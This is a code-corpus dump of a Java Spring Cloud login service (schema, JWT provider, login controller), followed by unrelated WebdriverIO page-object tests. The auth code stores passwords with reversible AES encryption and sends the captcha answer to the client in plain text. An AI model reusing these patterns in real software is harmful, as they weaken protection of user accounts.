<dependencies>
<dependency>
<groupId>commons-beanutils</groupId>
<artifactId>commons-beanutils</artifactId>
<version>1.8.0</version>
<scope>compile</scope>
</dependency>
<dependency>
<groupId>commons-fileupload</groupId>
<artifactId>commons-fileupload</artifactId>
<version>1.4</version>
<scope>compile</scope>
</dependency>
<!-- web -->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<exclusions>
<!--排除(去除)tomcat依赖-->
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-tomcat</artifactId>
</exclusion>
</exclusions>
</dependency>
<!-- websocket -->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-websocket</artifactId>
<exclusions>
<!-- Exclude spring-boot-starter-web here (it is declared above with Tomcat already excluded), to avoid pulling in a second, Tomcat-backed web starter -->
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</exclusion>
</exclusions>
</dependency>
<!--undertow容器-->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-undertow</artifactId>
</dependency>
<!-- web -->
<!-- spring-cloud begin -->
<!-- nacos -->
<dependency>
<groupId>com.alibaba.cloud</groupId>
<artifactId>spring-cloud-starter-alibaba-nacos-discovery</artifactId>
</dependency>
<dependency>
<groupId>com.alibaba.cloud</groupId>
<artifactId>spring-cloud-starter-alibaba-nacos-config</artifactId>
</dependency>
<!-- feign -->
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-starter-openfeign</artifactId>
</dependency>
<!-- sentinel 熔断限流 -->
<dependency>
<groupId>com.alibaba.cloud</groupId>
<artifactId>spring-cloud-starter-alibaba-sentinel</artifactId>
</dependency>
<!-- spring-cloud end -->
<dependency>
<groupId>net.logstash.logback</groupId>
<artifactId>logstash-logback-encoder</artifactId>
</dependency>
</dependencies>
</project><file_sep>/doc/db/microcloud_mysql5.7.sql
DROP DATABASE IF EXISTS `micro-cloud`;
create database `micro-cloud` default character set utf8mb4 collate utf8mb4_general_ci;
SET NAMES utf8mb4;
SET FOREIGN_KEY_CHECKS = 0;
USE `micro-cloud`;
-- ----------------------------
-- Table structure for sys_user
-- ----------------------------
DROP TABLE IF EXISTS `sys_user`;
CREATE TABLE `sys_user` (
  `id` varchar(32) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL COMMENT '主键id',
  `username` varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '登录账号',
  `realname` varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '真实姓名',
  `password` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '密码',
  `avatar` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '头像',
  `birthday` datetime(0) NULL DEFAULT NULL COMMENT '生日',
  `sex` tinyint(1) NULL DEFAULT NULL COMMENT '性别(0-默认未知,1-男,2-女)',
  `email` varchar(45) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '电子邮件',
  `phone` varchar(45) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '电话',
  `org_code` varchar(64) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '机构编码',
  -- fix: comment previously said 性别 (gender) but this column is the account status
  `status` tinyint(1) NULL DEFAULT NULL COMMENT '状态(1-正常,2-冻结)',
  `del_flag` tinyint(1) NULL DEFAULT NULL COMMENT '删除状态(0-正常,1-已删除)',
  `third_id` varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '第三方登录的唯一标识',
  `third_type` varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '第三方类型',
  `activiti_sync` tinyint(1) NULL DEFAULT NULL COMMENT '同步工作流引擎(1-同步,0-不同步)',
  `work_no` varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '工号,唯一键',
  `post` varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '职务,关联职务表',
  `telephone` varchar(45) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '座机号',
  `create_by` varchar(32) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '创建人',
  `create_time` datetime(0) NULL DEFAULT NULL COMMENT '创建时间',
  `update_by` varchar(32) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '更新人',
  `update_time` datetime(0) NULL DEFAULT NULL COMMENT '更新时间',
  `user_identity` tinyint(1) NULL DEFAULT NULL COMMENT '身份(1普通成员 2上级)',
  `depart_ids` longtext CHARACTER SET utf8 COLLATE utf8_general_ci NULL COMMENT '负责部门',
  PRIMARY KEY (`id`) USING BTREE,
  -- fix: removed `index_user_name`(`username`) — it duplicated the unique index below
  UNIQUE INDEX `uniq_sys_user_work_no`(`work_no`) USING BTREE,
  UNIQUE INDEX `uniq_sys_user_username`(`username`) USING BTREE,
  UNIQUE INDEX `uniq_sys_user_phone`(`phone`) USING BTREE,
  UNIQUE INDEX `uniq_sys_user_email`(`email`) USING BTREE,
  INDEX `index_user_status`(`status`) USING BTREE,
  INDEX `index_user_del_flag`(`del_flag`) USING BTREE
) ENGINE = InnoDB CHARACTER SET = utf8 COLLATE = utf8_general_ci COMMENT = '用户表' ROW_FORMAT = Dynamic;
-- ----------------------------
-- Seed data for sys_user (email/values look like sanitized placeholders — confirm before production use)
-- ----------------------------
INSERT INTO `sys_user` VALUES ('42d153bffeea74f72a9c1697874fa4a7', 'test22', '23232', 'uaaIHVXKz5plwekhq_yK6w', 'user/20190314/ly-plate-e_1552531617500.png', '2019-2-9 00:00:00', 1, '<EMAIL>', '18611782222', NULL, 1, 1, NULL, NULL, 1, NULL, NULL, NULL, 'admin', '2019-1-26 18:01:10', 'admin', '2019-3-23 15:05:50', NULL, NULL);
INSERT INTO `sys_user` VALUES ('a75d45a015c44384a04449ee80dc3503', 'jeecg', 'jeecg', 'uaaIHVXKz5plwekhq_yK6w', 'user/20190220/e1fe9925bc315c60addea1b98eb1cb1349547719_1550656892940.jpg', NULL, 1, NULL, NULL, '财务部', 1, 0, NULL, NULL, 1, '00002', 'devleader', NULL, 'admin', '2019-2-13 16:02:36', 'admin', '2020-5-2 15:34:30', 1, '');
INSERT INTO `sys_user` VALUES ('e9ca23d68d884d4ebb19d07889727dae', 'admin', '管理员', 'uaaIHVXKz5plwekhq_yK6w', 'http://minio.jeecg.com/otatest/temp/lgo33_1583397323099.png', '2018-12-5 00:00:00', 1, '<EMAIL>', '18611111111', 'A01', 1, 0, NULL, NULL, 1, '00001', '总经理', NULL, NULL, '2038-6-21 17:54:10', 'admin', '2020-5-2 18:19:41', 2, 'c6d7cb4deeac411cb3384b1b31278596');
INSERT INTO `sys_user` VALUES ('f0019fdebedb443c98dcb17d88222c38', 'zhagnxiao', '张小红', 'uaaIHVXKz5plwekhq_yK6w', 'user/20190401/20180607175028Fn1Lq7zw_1554118444672.png', '2019-4-1 00:00:00', NULL, NULL, NULL, '研发部,财务部', 1, 0, NULL, NULL, 1, '00003', '', NULL, 'admin', '2023-10-1 19:34:10', 'admin', '2020-5-2 15:34:51', 1, '');
-- ----------------------------
-- Table structure for sys_log
-- ----------------------------
-- NOTE(review): sys_log uses MyISAM while sys_user uses InnoDB — confirm this is intentional.
DROP TABLE IF EXISTS `sys_log`;
CREATE TABLE `sys_log` (
  `id` varchar(32) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL,
  `log_type` int(2) NULL DEFAULT NULL COMMENT '日志类型(1登录日志,2操作日志)',
  `log_content` varchar(1000) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '日志内容',
  `operate_type` int(2) NULL DEFAULT NULL COMMENT '操作类型',
  `userid` varchar(32) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '操作用户账号',
  `username` varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '操作用户名称',
  `ip` varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT 'IP',
  `method` varchar(500) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '请求java方法',
  `request_url` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '请求路径',
  `request_param` longtext CHARACTER SET utf8 COLLATE utf8_general_ci NULL COMMENT '请求参数',
  `request_type` varchar(10) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '请求类型',
  `cost_time` bigint(20) NULL DEFAULT NULL COMMENT '耗时',
  `create_by` varchar(32) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '创建人',
  `create_time` datetime(0) NULL DEFAULT NULL COMMENT '创建时间',
  `update_by` varchar(32) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '更新人',
  `update_time` datetime(0) NULL DEFAULT NULL COMMENT '更新时间',
  PRIMARY KEY (`id`) USING BTREE,
  INDEX `index_table_userid`(`userid`) USING BTREE,
  -- fix: removed the typo'd `index_logt_ype`(`log_type`), which duplicated `index_log_type` below
  INDEX `index_operate_type`(`operate_type`) USING BTREE,
  INDEX `index_log_type`(`log_type`) USING BTREE
) ENGINE = MyISAM CHARACTER SET = utf8 COLLATE = utf8_general_ci COMMENT = '系统日志表' ROW_FORMAT = Dynamic;
<file_sep>/micro-cloud-security/src/main/java/com/cloud/security/TokenProvider.java
package com.cloud.security;
import cn.hutool.core.util.ObjectUtil;
import com.cloud.common.constant.CacheConstant;
import com.cloud.common.constant.CommonConstant;
import com.cloud.common.exception.MicroCloudException;
import com.cloud.config.JwtConfig;
import com.cloud.modules.system.entity.LoginUser;
import com.cloud.modules.utils.JwtUtil;
import com.cloud.modules.utils.RedisUtils;
import com.cloud.modules.utils.StringUtils;
import io.jsonwebtoken.*;
import io.jsonwebtoken.io.Decoders;
import io.jsonwebtoken.security.Keys;
import lombok.extern.slf4j.Slf4j;
import org.springframework.beans.factory.InitializingBean;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.security.authentication.UsernamePasswordAuthenticationToken;
import org.springframework.security.core.Authentication;
import org.springframework.security.core.GrantedAuthority;
import org.springframework.security.core.authority.SimpleGrantedAuthority;
import org.springframework.security.core.userdetails.User;
import org.springframework.stereotype.Component;
import javax.servlet.http.HttpServletRequest;
import java.security.Key;
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
import java.util.Date;
import java.util.stream.Collectors;
/**
 * Generates and validates JWT tokens and manages the Redis-backed
 * online-user token refresh ("stay logged in while active") mechanism.
 *
 * InitializingBean: after Spring finishes property injection it invokes
 * afterPropertiesSet(), which is used here to derive the signing key once.
 */
@Slf4j
@Component
public class TokenProvider implements InitializingBean {

    /** Claim name under which the comma-joined authority list is stored. */
    private static final String AUTHORITIES_KEY = "auth";

    @Autowired
    private RedisUtils redisUtils;

    /** HMAC signing key derived from the configured Base64 secret. */
    private Key key;

    @Override
    public void afterPropertiesSet() throws Exception {
        // Decode the Base64 secret once; the same key is reused for signing and parsing.
        byte[] keyBytes = Decoders.BASE64.decode(JwtConfig.BASE64SECRET);
        this.key = Keys.hmacShaKeyFor(keyBytes);
    }

    /**
     * Creates a signed JWT carrying the subject (user name) and the
     * user's authorities as a comma-joined claim.
     *
     * @param authentication the authenticated principal to encode
     * @return a compact, HS512-signed JWT string
     */
    public String createToken(Authentication authentication) {
        String authorities = authentication.getAuthorities().stream()
                .map(GrantedAuthority::getAuthority)
                .collect(Collectors.joining(","));
        long now = (new Date()).getTime();
        // NOTE(review): the constant name suggests seconds, but it is added to a
        // millisecond timestamp without conversion — confirm the intended unit.
        Date validity = new Date(now + JwtConfig.TOKENVALIDITYINSECONDS);
        return Jwts.builder()
                .setSubject(authentication.getName())
                .claim(AUTHORITIES_KEY, authorities)
                .signWith(key, SignatureAlgorithm.HS512)
                .setExpiration(validity) // token expiry time
                .compact();
    }

    /**
     * Rebuilds a Spring Security Authentication from the token's claims.
     *
     * @param token a signed JWT previously produced by createToken
     * @return an authenticated UsernamePasswordAuthenticationToken
     */
    Authentication getAuthentication(String token) {
        Claims claims = Jwts.parser()
                .setSigningKey(key)
                .parseClaimsJws(token)
                .getBody();
        Object authoritiesStr = claims.get(AUTHORITIES_KEY);
        // Tolerate a missing/empty authorities claim instead of failing on split().
        Collection<? extends GrantedAuthority> authorities =
                ObjectUtil.isNotEmpty(authoritiesStr) ?
                        Arrays.stream(authoritiesStr.toString().split(","))
                                .map(SimpleGrantedAuthority::new)
                                .collect(Collectors.toList()) : Collections.emptyList();
        User principal = new User(claims.getSubject(), "", authorities);
        return new UsernamePasswordAuthenticationToken(principal, token, authorities);
    }

    /**
     * Validates a token's signature and expiry.
     *
     * Bug fix: the JJWT parser throws JwtException subtypes (e.g.
     * ExpiredJwtException), never MicroCloudException, so the original
     * catch block was dead code and raw JJWT exceptions leaked to callers.
     *
     * @param token the compact JWT to check
     * @return true if the token parses and is signed by our key
     * @throws MicroCloudException if the token is expired or malformed
     */
    public boolean validateToken(String token) {
        try {
            Jwts.parser().setSigningKey(key).parseClaimsJws(token);
            return true;
        } catch (ExpiredJwtException e) {
            throw new MicroCloudException("token已过期");
        } catch (JwtException | IllegalArgumentException e) {
            // Malformed, tampered-with, or null/blank token.
            throw new MicroCloudException("token已过期");
        }
    }

    /**
     * Extracts the bearer token from the configured request header,
     * stripping the configured prefix.
     *
     * @param request the incoming HTTP request
     * @return the raw token, or null when the header is absent or unprefixed
     */
    public String getToken(HttpServletRequest request) {
        final String requestHeader = request.getHeader(JwtConfig.HEADER);
        if (requestHeader != null && requestHeader.startsWith(JwtConfig.getTokenStartWith())) {
            // Fix: strip the actual configured prefix length rather than a magic 7
            // (identical behavior when the prefix is the 7-char "Bearer ").
            return requestHeader.substring(JwtConfig.getTokenStartWith().length());
        }
        return null;
    }

    /**
     * Verifies that a token maps to a valid, unlocked cached user and is
     * still alive (refreshing it if the user is actively working).
     *
     * @param token the token presented by the client
     * @return true when the token is effective
     * @throws MicroCloudException for illegal tokens, missing/locked users,
     *                             or fully expired sessions
     */
    public Boolean checkUserTokenIsEffect(String token) throws MicroCloudException {
        // Resolve the account from the token.
        String username = JwtUtil.getUsername(token);
        if (StringUtils.isBlank(username)) {
            throw new MicroCloudException("非法token");
        }
        // Load the cached online user for this token.
        LoginUser loginUser = (LoginUser) redisUtils.get(CacheConstant.SYS_USERS_CACHE + ":" + token);
        if (loginUser == null) {
            throw new MicroCloudException("用户不存在");
        }
        // Reject locked/frozen accounts.
        if (loginUser.getStatus() != 1) {
            throw new MicroCloudException("账号已被锁定,请联系管理员");
        }
        // Verify token liveness and refresh it for active users.
        if (!this.jwtTokenRefresh(token, username, loginUser.getPassword())) {
            // Fix: punctuation made consistent with the message used elsewhere.
            throw new MicroCloudException("Token失效,请重新登录");
        }
        return true;
    }

    /**
     * Refreshes the token so that active users stay logged in.
     *
     * 1: on login the JWT is cached under its own value with a TTL of twice the JWT lifetime
     * 2: each request passes through the filters into authentication
     * 3: if the JWT itself expired but its cache entry survives, the user was active —
     *    a fresh JWT is generated and cached, restarting the cache TTL
     * 4: if both the JWT and its cache entry expired, the session is over and the
     *    caller reports "please log in again"
     *
     * @param token    the presented JWT (also the cache key suffix)
     * @param userName account name encoded in the token
     * @param passWord cached password used to re-sign a replacement token
     * @return true when the session is still alive, false when fully expired
     */
    public boolean jwtTokenRefresh(String token, String userName, String passWord) {
        // Bug fix: the original wrapped the cache hit in String.valueOf(...),
        // turning a null miss into the literal string "null", which passed the
        // isNotBlank check — missing cache entries were treated as live tokens.
        Object cacheToken = redisUtils.get(CommonConstant.PREFIX_USER_TOKEN + token);
        if (cacheToken == null || StringUtils.isBlank(String.valueOf(cacheToken))) {
            // Cache entry gone: the whole session has expired.
            return false;
        }
        // JWT expired but the cache entry survives: the user is active, so re-issue.
        if (!JwtUtil.verify(token, userName, passWord)) {
            log.info("---------------------用户在线操作, 更新token保证不掉线----------------------");
            String newToken = JwtUtil.sign(userName, passWord);
            // Cache the replacement token and restart its TTL (2x the JWT lifetime).
            redisUtils.set(CommonConstant.PREFIX_USER_TOKEN + newToken, newToken);
            redisUtils.expire(CommonConstant.PREFIX_USER_TOKEN + newToken, JwtUtil.EXPIRE_TIME * 2 / 1000);
        }
        return true;
    }
}
<file_sep>/micro-cloud-system/src/main/java/com/cloud/modules/system/controller/LoginController.java
package com.cloud.modules.system.controller;
import cn.hutool.core.util.IdUtil;
import cn.hutool.core.util.RandomUtil;
import com.alibaba.fastjson.JSONObject;
import com.cloud.annotation.AnonymousAccess;
import com.cloud.annotation.AutoLog;
import com.cloud.common.api.Result;
import com.cloud.common.constant.CacheConstant;
import com.cloud.common.constant.CommonConstant;
import com.cloud.modules.shiro.vo.DefContants;
import com.cloud.modules.system.entity.SysUser;
import com.cloud.modules.system.model.SysLoginModel;
import com.cloud.modules.system.service.ISysUserService;
import com.cloud.modules.system.entity.LoginUser;
import com.cloud.modules.utils.JwtUtil;
import com.cloud.modules.utils.RedisUtils;
import com.cloud.modules.utils.StringUtils;
import com.cloud.modules.utils.encryption.AesEncryptUtil;
import io.swagger.annotations.Api;
import io.swagger.annotations.ApiOperation;
import lombok.extern.slf4j.Slf4j;
import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authz.annotation.RequiresGuest;
import org.springframework.beans.BeanUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.web.bind.annotation.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.validation.Valid;
import java.util.HashMap;
import java.util.Map;
@Slf4j
@RestController
@RequestMapping("sys")
@Api(tags = "用户登录")
public class LoginController {

    /**
     * Prefix used when generating the captcha's UUID cache key.
     */
    @Value("${jwt.code-key}")
    private String codeKey;

    @Autowired
    private RedisUtils redisUtils;

    @Autowired
    private ISysUserService userService;

    /** Character pool the captcha text is drawn from. */
    private static final String BASE_CHECK_CODES = "qwertyuiplkjhg<KEY>";

    /**
     * Login endpoint: validates the captcha, the account state and the
     * password, then issues a JWT and caches the online user.
     *
     * @param sysLoginModel username/password/captcha payload
     * @return success result carrying {token, userInfo}, or an error result
     */
    @PostMapping("/login")
    @ApiOperation("登录接口")
    public Result<JSONObject> login(@RequestBody @Valid SysLoginModel sysLoginModel) {
        Result<JSONObject> res = new Result<>();
        String username = sysLoginModel.getUsername();
        String password = sysLoginModel.getPassword();
        String captcha = sysLoginModel.getCaptcha();
        // One-shot captcha: read it, then delete it so it cannot be replayed.
        String checkCode = (String) redisUtils.get(sysLoginModel.getUuid());
        redisUtils.del(sysLoginModel.getUuid());
        if (StringUtils.isBlank(checkCode)) {
            res.error500("验证码不存在或者已过期");
            return res;
        }
        // Robustness fix: guard against a null captcha before the
        // case-insensitive comparison (previously an NPE on missing input).
        if (captcha == null || !captcha.equalsIgnoreCase(checkCode)) {
            res.error500("验证码错误");
            return res;
        }
        // Verify the account exists and is usable (not frozen/deleted).
        SysUser sysUser = userService.getUserByName(username);
        Result result = userService.checkUserIsEffective(sysUser);
        if (!result.isSuccess()) {
            return result;
        }
        // Encrypt the submitted password the same way the stored one was.
        String encryptPassword = "";
        try {
            encryptPassword = AesEncryptUtil.encrypt(password);
        } catch (Exception e) {
            e.printStackTrace();
        }
        if (!encryptPassword.equals(sysUser.getPassword())) {
            res.error500("用户名或者密码错误");
            return res;
        }
        // Populate the token and user info into the result.
        userInfo(sysUser, res);
        return res;
    }

    /**
     * Logout endpoint: clears the cached token and online user, then logs
     * out of Shiro.
     *
     * @param request  used to read the access-token header
     * @param response unused, kept for interface compatibility
     * @return success on logout, error when the token is missing or invalid
     */
    @GetMapping("/logout")
    @ApiOperation("退出登录")
    public Result<Object> logout(HttpServletRequest request, HttpServletResponse response) {
        // Read the client's token.
        String token = request.getHeader(DefContants.X_ACCESS_TOKEN);
        if (StringUtils.isBlank(token)) {
            return Result.error("退出失败");
        }
        // Resolve the account encoded in the token.
        String username = JwtUtil.getUsername(token);
        SysUser user = userService.getUserByName(username);
        if (user != null) {
            // Remove the login token and the cached online user.
            redisUtils.del(CommonConstant.PREFIX_USER_TOKEN + token);
            redisUtils.del(CacheConstant.SYS_USERS_CACHE + ":" + token);
            // Let Shiro tear down the subject.
            SecurityUtils.getSubject().logout();
            // Bug fix: a successful logout was previously returned via
            // Result.error("退出成功") — an error wrapper around a success message.
            Result<Object> res = new Result<>();
            res.setSuccess(true);
            res.setMessage("退出成功");
            return res;
        } else {
            return Result.error("Token 无效 退出失败");
        }
    }

    /**
     * Generates a captcha, caches its lowercase form under a UUID key for
     * 60 seconds, and returns {img, uuid} to the client.
     *
     * NOTE(review): the "img" field currently carries the plain captcha text,
     * not a rendered image — confirm this matches the front end's expectation.
     */
    @ApiOperation("获取验证码")
    @GetMapping("/randomImage")
    public Result<Map<String, Object>> randomImage(HttpServletRequest request, HttpServletResponse response) {
        Result res = new Result();
        try {
            String code = RandomUtil.randomString(BASE_CHECK_CODES, 4);
            // Cache the lowercase form; login() compares case-insensitively.
            String lowerCaseCode = code.toLowerCase();
            // A UUID (prefixed with codeKey) uniquely identifies this captcha.
            String uuid = codeKey + IdUtil.simpleUUID();
            // Captcha expires after 60 seconds.
            redisUtils.set(uuid, lowerCaseCode, 60);
            HashMap<String, Object> map = new HashMap<String, Object>(2) {{
                put("img", code);
                put("uuid", uuid);
            }};
            res.setSuccess(true);
            res.setResult(map);
        } catch (Exception e) {
            e.printStackTrace();
            res.error500("获取验证码错误" + e.getMessage());
        }
        return res;
    }

    /**
     * Issues a JWT for the user, caches the token and the online user with a
     * TTL of twice the JWT lifetime, and fills the result payload.
     *
     * @param sysUser authenticated account
     * @param res     result to populate with {token, userInfo}
     * @return the same result instance, for chaining
     */
    private Result<JSONObject> userInfo(SysUser sysUser, Result<JSONObject> res) {
        // Sign a token from username + (already encrypted) password.
        String token = JwtUtil.sign(sysUser.getUsername(), sysUser.getPassword());
        // Cache the token itself with a 2x-lifetime TTL (enables refresh-on-activity).
        redisUtils.set(CommonConstant.PREFIX_USER_TOKEN + token, token);
        redisUtils.expire(CommonConstant.PREFIX_USER_TOKEN + token, JwtUtil.EXPIRE_TIME * 2 / 1000);
        // Cache the online user keyed by the same token.
        LoginUser loginUser = new LoginUser();
        BeanUtils.copyProperties(sysUser, loginUser);
        redisUtils.set(CacheConstant.SYS_USERS_CACHE + ":" + token, loginUser);
        redisUtils.expire(CacheConstant.SYS_USERS_CACHE + ":" + token, JwtUtil.EXPIRE_TIME * 2 / 1000);
        JSONObject obj = new JSONObject();
        obj.put("token", token);
        obj.put("userInfo", loginUser);
        res.setResult(obj);
        res.setMessage("登录成功");
        return res;
    }

    /**
     * Anonymous-access test endpoint. The division by zero deliberately
     * throws ArithmeticException — presumably to exercise the exception /
    * EFK logging path (see @AutoLog("测试EFK")); confirm before "fixing".
     */
    @AnonymousAccess
    @GetMapping("/add")
    @AutoLog("测试EFK")
    @ApiOperation("测试匿名访问 访问接口")
    public Result<?> testAnonymousAccess() {
        int a = 1 / 0;
        System.out.println(a);
        Result<Object> res = new Result<>();
        res.setSuccess(true);
        res.setResult("测试匿名访问 访问接口");
        return res;
    }

    /**
     * Scratch/test endpoint; reads the token header but returns an empty
     * result regardless.
     */
    @GetMapping("/test111")
    @ApiOperation("sdfdafdaf")
    public Result<?> testRedis(HttpServletRequest request) {
        Result<Object> res = new Result<>();
        String token = request.getHeader(DefContants.X_ACCESS_TOKEN);
        return res;
    }
}
<file_sep>/micro-cloud-common/src/main/java/com/cloud/feign/SysLogFeignClient.java
package com.cloud.feign;
import com.alibaba.fastjson.JSONObject;
import com.cloud.common.api.Result;
import com.cloud.feign.fallback.SysLogFeignClientFallback;
import org.springframework.cloud.openfeign.FeignClient;
import org.springframework.stereotype.Component;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
/**
 * Feign client for the micro-cloud-system service's log endpoint, with
 * {@link SysLogFeignClientFallback} handling failed calls.
 */
@Component
@FeignClient(contextId = "sysLogFeignClient",value = "micro-cloud-system",fallback = SysLogFeignClientFallback.class)
public interface SysLogFeignClient {
    /**
     * Saves a system log record by POSTing the payload to the remote
     * /sys/log/save endpoint.
     *
     * @param jsonObject log payload forwarded as the request body
     * @return the remote service's Result wrapper
     */
    @PostMapping("/sys/log/save")
    Result<?> saveSysLog(@RequestBody JSONObject jsonObject);
}
<file_sep>/micro-cloud-system/src/main/java/com/cloud/modules/system/service/impl/SysLogServiceImpl.java
package com.cloud.modules.system.service.impl;
import com.baomidou.mybatisplus.extension.service.impl.ServiceImpl;
import com.cloud.modules.system.mapper.SysLogMapper;
import com.cloud.modules.system.service.ISysLogService;
import com.cloud.modules.system.entity.SysLog;
import org.springframework.stereotype.Service;
/**
 * MyBatis-Plus service implementation for {@link SysLog} records; all CRUD
 * behaviour is inherited from {@link ServiceImpl} over {@link SysLogMapper}.
 */
@Service
public class SysLogServiceImpl extends ServiceImpl<SysLogMapper, SysLog> implements ISysLogService {
}
| 1280740b572487ab361015c1e524b2073a552415 | [
"Java",
"Maven POM",
"SQL",
"INI"
] | 23 | INI | tang-shao/tang-shao-micro-cloud | 0b256347b15731f52cf42ed2f4fce876b8d89785 | 63f43cfe7f2e517bb98a97bfae4b154db3000e50 |
refs/heads/master | <repo_name>Darhan2020/-NY-Project<file_sep>/Automation/pageObjects/webTable.js
class WebTable {
get btnAdd() {
return $("#addNewRecordButton");
}
get modal() {
return $(".modal-content");
}
get modalHeader() {
return $("#registration-form-modal").getText();
}
get firstName() {
return $("#firstName");
}
get lastName() {
return $("#lastName");
}
get userEmail() {
return $("#userEmail");
}
get age() {
return $("#age");
}
get salary() {
return $("#salary");
}
get department() {
return $("#department");
}
get allFields() {
return [
this.firstName,
this.lastName,
this.userEmail,
this.age,
this.salary,
this.department,
];
}
get btnSubmit() {
return $("#submit");
}
get inputFirstName() {
return $("#firstName");
}
get inputFirstNamePlaceholder() {
return this.inputFirstName.getAttribute("placeholder");
}
get inputLastName() {
return $("#lastName");
}
get inputLastNamePlaceholder() {
return this.inputLastName.getAttribute("placeholder");
}
get inputEmail() {
return $("#userEmail");
}
get inputEmailPlaceholder() {
return this.inputEmail.getAttribute("placeholder");
}
get inputAge() {
return $("#age");
}
get inputAgePlaceholder() {
return this.inputAge.getAttribute("placeholder");
}
get inputSalary() {
return $("#salary");
}
get inputSalaryPlaceholder() {
return this.inputSalary.getAttribute("placeholder");
}
get inputDepartment() {
return $("#department");
}
get inputDepartmentPlaceholder() {
return this.inputDepartment.getAttribute("placeholder");
}
}
export default new WebTable();
<file_sep>/Automation/test/specs/webTables.js
const expect = require("chai").expect;
import {URLs, webPlaceholders} from "../../expect";
import WebTable from "../../pageObjects/webTable";
describe('Validate Web Tables section', () => {
it('Click on add button and check if new modal apprars', () => {
browser.url(URLs.webTable);
if(!WebTable.btnAdd.isDisplayedInViewport())WebTable.btnAdd.scrollIntoView();
WebTable.btnAdd.click();
WebTable.modal.waitForExist({timeout:5000});
expect(WebTable.modal.isExisting()).to.be. true;
expect(WebTable.modalHeader).to.equal("Registration Form");
});
it('Validate all fields are required', () => {
for(let el of WebTable.allFields){
expect(el.getProperty('required')).to.be.true;
}
});
it('Validate placeholder of all fields', () => {
expect(WebTable.inputFirstNamePlaceholder).to.equal(webPlaceholders.firstName);
expect(WebTable.inputLastNamePlaceholder).to.equal(webPlaceholders.lastName);
expect(WebTable.inputAgePlaceholder).to.equal(webPlaceholders.age);
expect(WebTable.inputEmailPlaceholder).to.equal(webPlaceholders.email);
expect(WebTable.inputDepartmentPlaceholder).to.equal(webPlaceholders.department);
expect(WebTable.inputSalaryPlaceholder).to.equal(webPlaceholders.salary);
});
});<file_sep>/Automation/pageObjects/practiceForm.js
class PracticeForm {
get labelHeader(){
return $$("#app > div > div > div.pattern-backgound.playgound-header > div")[0].getText();
}
get labelName() {
return $("#userName-label").getText();
}
get labelEmail() {
return $("#userEmail-label").getText();
}
get labelGender() {
return $$("#genterWrapper > div.col-md-3.col-sm-12")[0].getText();
}
get labelMobileNumber() {
return $("#userNumber-label").getText();
}
get labelDateOfBirth() {
return $("#dateOfBirth-label").getText();
}
get labelSubjects() {
return $$("#subjects-label")[0].getText();
}
get labelHobbies() {
return $$("#subjects-label")[1].getText();
}
get labelPicture() {
return $$("#subjects-label")[2].getText();
}
get labelCurrentAddress() {
return $("#currentAddress-label").getText();
}
get labelStateAndCity() {
return $("#stateCity-label").getText();
}
get hobbiesSports() {
return $("#hobbies-checkbox-1");
}
get hobbiesReading() {
return $("#hobbies-checkbox-2");
}
get hobbiesMusic() {
return $("#hobbies-checkbox-3");
}
get inputFirstName() {
return $("#firstName");
}
get inputFirstNamePlaceholder() {
return this.inputFirstName.getAttribute("placeholder");
}
get inputLastName() {
return $("#lastName");
}
get inputLastNamePlaceholder() {
return this.inputLastName.getAttribute("placeholder");
}
get inputEmail() {
return $("#userEmail");
}
get inputEmailPlaceholder() {
return this.inputEmail.getAttribute("placeholder");
}
get inputMobile() {
return $("#userNumber");
}
get inputMobilePlaceholder() {
return this.inputMobile.getAttribute("placeholder");
}
get inputCurrentAddress() {
return $("#currentAddress");
}
get inputCurrentAddressPlaceholder() {
